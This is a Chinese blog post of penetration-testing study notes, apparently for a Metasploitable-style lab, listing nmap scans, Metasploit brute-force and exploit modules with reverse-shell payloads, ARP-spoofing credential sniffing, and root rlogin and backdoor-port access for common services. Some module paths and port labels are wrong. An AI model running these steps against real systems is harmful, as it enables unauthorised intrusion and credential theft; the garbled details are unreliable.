kali对常见端口的漏洞破解收录

最新推荐文章于 2024-05-17 15:10:14 发布
最新推荐文章于 2024-05-17 15:10:14 发布
阅读量3k 收藏 59
点赞数 5
分类专栏: 学习 经验 web渗透初级知识 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a_ittle_pan/article/details/108566078
版权 
1.web应用漏洞扫描
	1).Owasp-zap(扫描漏洞)
	2).nikto(漏洞扫描)
	 nikto +host +"destip"
	3).sqlmap(sql注入)
	
2.TCP漏洞利用
	1).使用Nmap进行端口扫描
	 nmap -p 21 "destip"
	2).使用nc进行ftp链接
	 nc “destip”
	 
3.TCP密码暴力破解
	1).medusa
	  Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

4.TCP用户名明文密码嗅探
	1).arpspoof(对正在进行TCP链接的两台机器进行ARP嗅探)
	 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
	2).wireshark(对两台正在进行TCP链接的两台及其进行数据监控进而获取用户名和密码)
	
5.ssh环境搭建

6.ssh-Banner信息的获取
	1).nmap
	 nmap -sV -p 22 + “destip”
	2).metaspolit
	  2.1).msfconsole以终端的形式启动metaspolit
	  2.2).use auxiliary/scanner/ssh/ssh_version 
	  2.3).set rhosts 192.168.37.142
	  2.4).run
	
	3).nc +"destip" +"端口号"

7.通过修改配置文件,可以使别人无法获取ubuntu的版本信息
 	1).sudo gedit sshd_config
 	2).重启服务

1.ssh弱口令破解
	1).medusa
	 Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M mod
	2).metasploit
	  2.1).msfconsole
	  2.2).使用use auxiliary/scanner/ssh/ssh_login
	  2.3).set rhosts 192.168.37.142
	  2.4).set username lzs
	  2.5).set password 123456
	  2.6).run
	3).通过metasploit获取meterpreter shell
	
2.ssh漏洞防护
	1.修改sshd_config(ctrl+f 搜索port修改ssh的端口)
	sudo gedit /etc/sshd_config

3.telnet信息获取
	1).使用namp对telnet进行版本获取
	 nmap -p 23 -sV 192.168.37.142
	2).使用metasploit进行版本获取
	 2.1).msfconsole
	 2.2).use auxiliary/scanner/telnet/telnet_version 
	 2.3).set rhost 192.168.37.142
	 2.4).run

4.telnet暴力密码破解
	1.使用metasploit进行破解
	  1.1).msgconsole
	  1.2).use auxiliary/scanner/telnet/telnet_login
	  1.3).show options查看需要设置的参数
	  1.4).set user + 用户名 --设置用户名
	  1.5).set pass_file + 目标文件 --设置用户字典
	  1.6).set threads 10 设置线程数
	  1.7).run 运行
	  
5.rmi漏洞
	1).使用nmap进行端口扫描
	  nmap -p 1099 -sV 192.168.1.9
	2).使用metasploit进行漏洞攻击
	  2.1).msfconsole
	  2.2).use exploit/multi/misc/java_rmi_server 
	  2.3).set rhost
	  2.4).set payload java/meterpreter/reverse_tcp
	  2.5).exploit
	  
6.后门漏洞
	1.使用nmap进行端口扫描
	 nmap -p 1524 -sV 192.168.1.9
	2).使用nc进行链接
	 nc 192.168.1.9 1524
	 	  

7.nfs漏洞
	1.使用nmap端口扫描
	 nmap -p 2049 192.168.37.142
	2).如果nfs配置不当,对方能对本机上的所有文件进行操作

1.rpcbind信息泄漏
	1).nmap对111端口扫描获取信息
	 nmap -p 111 -sV 192.168.37.142
	2).nmap脚本对111进行脚本探测
	 nmap -p 111 --script=rpcinfo 192.168.37.142
	3).metasploit进行端口扫描
	 3.1).msfconsole
	 3.2).use auxiliary/scanner/misc/sunrpc_portmapper
	 3.3).set rhost
	 3.4).run
	
2.samba RCE远程命令执行漏洞利用(111端口漏洞)
	1.metasploit
	 1.1).msfconsole
	 1.2).use exploit/multi/samba/usermap_script 
	 1.3).set rhost
	 1.4).set payload cmd/unix/reverse
	 1.5).exploit(获取shell)
	 
3.rlogin最高权限登录(需要目标开放512513端口)
	1.使用namp对512513端口进行扫描
	2.rlogin登录
	 rlogin -l root 192.168.37.142
	
1.proftp测试
	1.1).namp进行端口扫描
	 nmap -p 2121 -sV 192.168.37.140
	1.2.msf密码破解
	 1).使用matesploit进行破解
	 
2.mysql弱口令破解
	1.1.nmap进行端口扫描
	 nmap -p 3306 -sV 192.168.37.140
	1.2).msf进行密码破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/mysql/mysql_login(使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).通过mysql进行登录
	  mysql -h 192.168.37.140 -u root
	1.4).操作mysql的数据
	
3.postgresql数据库密码破解
	1.1).nmap进行端口扫描
	 nmap -p 5432 -sV 192.168.37.140
	1.2).msf进行暴力破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/postgres/postgres_login使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).使用msf获取shell
	  1.3.1).msfconsole
	  1.3.2).use exploit/linux/postgres/postgres_payload 使用这个模块进行破解)
	  1.3.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	  1.3.4).exploit
	 
4.vnc密码破解
	searchsploit vnc进行版本漏洞查询
	同上面端口漏洞操作步骤!!!
	
5.irc密码破解
	searchsploit irc进行版本漏洞查询
	同上面端口漏洞操作步骤!!!
	
6.tomcat密码破解
	1.1).nmap进行端口扫描
	 nmap -p 8180 -sV 192.168.37.140
	1.2).msf进行暴力破解
	  1.2.1).msfconsole
	  1.2.2).use auxiliary/scanner/http/tomcat_mgr_login 使用这个模块进行破解)
	  1.2.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	1.3).使用msf获取shell
	  1.3.1).msfconsole
	  1.3.2).use exploit/linux/postgres/tomcat_mgr_deploy 使用这个模块进行破解)
	  1.3.3.设置模块的参数,跟以往的参数设置类似(可用show options进行参数的查看)
	  1.3.4).exploit	


7.redis密码破解
	原理同上
a_ittle_pan
关注
  • 5
    点赞
  • 59
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
111端口安全
weixin_34260991的博客
11-01 966
端口安全试验,请下载附件 转载于:https://blog.51cto.com/network0546/220029
111端口rpcbind漏洞
热门推荐
HEAVEN569的博客
03-12 2万+
111端口rpcbind漏洞 最近扫描一个内网的ip,发现有一个不常见端口开着,服务是rpcbind,上网一查还真是有漏洞。 该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。 nmap -sS -sV -T4 192.168.26.28 使用metasploit(msf)验证漏洞 use auxiliary/scanner/misc/sunrpc_portmapper .
工业信息安全技能大赛新职业技能锦标赛(保定‘电谷杯‘总决赛)——金盾先锋战队web部分writeup
qq_44611153的博客
05-17 456
根据漏洞构造POST请求,但要注意这里是要黑入服务器获取flag而不是查看PHP信息,上传内容这里改为一句话木马:
vulnhub DC:1渗透笔记
weixin_52268949的博客
03-25 979
靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/kali ip地址。
靶机练习:DC-1靶机复现
m0_63755076的博客
09-02 1693
发现了三个端口,80、22和111三个端口。80和22端口可以进行攻击,111端口一般是rpcbind漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。发现密码是进过加密的,重置密码,可利/scripts/password-hash.sh脚本进行生成新密码。发现flag,该服务器开放了22端口,可以用hydra工具进行爆破。mysql正在运行,用刚才发现的密码进入数据库。
【rpcbind漏洞111端口入侵实战指南--关注紫灵小姐姐不踩坑】
m0_59598029的博客
01-31 1272
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
rpcbind漏洞111端口
qq_50854662的博客
07-03 1544
rpcbind漏洞111端口
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
nmap 扫描 端口 安全 kali
11-01
Nmap(诸神之眼)是主机扫描工具,他得图形化是zenmap,分布式框架为Damap 他可以做什么? 主机探测 端口扫描 版本检测 系统检测 探测脚本的编写
kali工具burpsuit(1.7)破解
01-03
来自“黑白之道”分享 2018-01-03 http://mp.weixin.qq.com/s/jNu9ETJaiKHEyRlQIDHtjA larrylau大牛破解的 ,burp永久破解版,有效期至2099-12-3 我在kali2环境中部署的,里面有简单的部署说明
kali Linux系统的漏洞利用
最新发布
06-19
### Kali Linux系统的漏洞利用 #### 一、Metasploitable操作系统 Metasploitable是一款专为安全测试和渗透测试设计的操作系统,基于Ubuntu Linux。它预装了一系列易受攻击的服务和应用程序,使得安全专家可以方便...
49-49.渗透测试-Kali Linux漏洞扫描.mp4
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
6-14漏洞利用-rpcbind漏洞利用
山兔的博客
07-22 1万+
通俗的来说,rpcbind是NFS中用来进行消息通知的服务。一般情况下rpcbind运行在111、31端口。并且NFS配置开启rpcbind_enable=“YES”我们来探测当前机器的开放端口,一般开启了rpcbind,会有nfs网络共享的功能,nfs端口是2049。...
九、漏洞利用-下
谢小二的博客
06-06 2062
smtp、rpcbind、samba等漏洞利用
Metasploit2: tcp port 111 – rpcbind
Nixawk
07-29 8454
Metasploit2: tcpport 111 – rpcbind RPC& portmapper (111 TCP + other UDP) portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上
常见端口
3条鱼 的命名空间
07-13 1105
在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。  21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。  端口
RPCBind反射DDOS攻击复现
weixin_68647219的博客
11-07 1012
原理发送虚假UDP请求,伪造源IP地址,将请求包中的源IP地址替换成攻击目标,反射服务器收到请求包发送响应来完成整个攻击流程。2.资产测绘在渗透测试过程中,如果发现111端口,基本就会存在该漏洞
80端口漏洞利用kali
04-02
80端口是HTTP协议默认使用的端口,常用于Web服务器。Kali Linux是一款专门用于渗透测试和网络安全的操作系统。在Kali Linux中,有一些工具可以用于检测和利用80端口漏洞。 其中一个常用的工具是Metasploit Framework,它是一款功能强大的渗透测试工具。Metasploit Framework提供了多个模块,可以用于检测和利用各种漏洞,包括80端口漏洞。 要利用80端口漏洞,首先需要进行漏洞扫描,以确定目标系统是否存在漏洞。可以使用Metasploit Framework中的模块进行扫描,例如使用http_version模块来检测目标系统的HTTP版本,或使用http_put模块来检测目标系统是否允许HTTP PUT方法。 如果发现目标系统存在漏洞,可以使用Metasploit Framework中相应的模块进行利用。例如,使用exploit/multi/http/apache_mod_cgi_bash_env_exec模块来利用Apache mod_cgi漏洞,或使用exploit/multi/http/php_cgi_arg_injection模块来利用PHP CGI漏洞。 需要注意的是,利用漏洞是一项高风险的行为,应该在合法授权和合规的情况下进行。未经授权的渗透测试是违行为,可能导致法律责任。在进行渗透时,请确保遵守相关法律法规和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值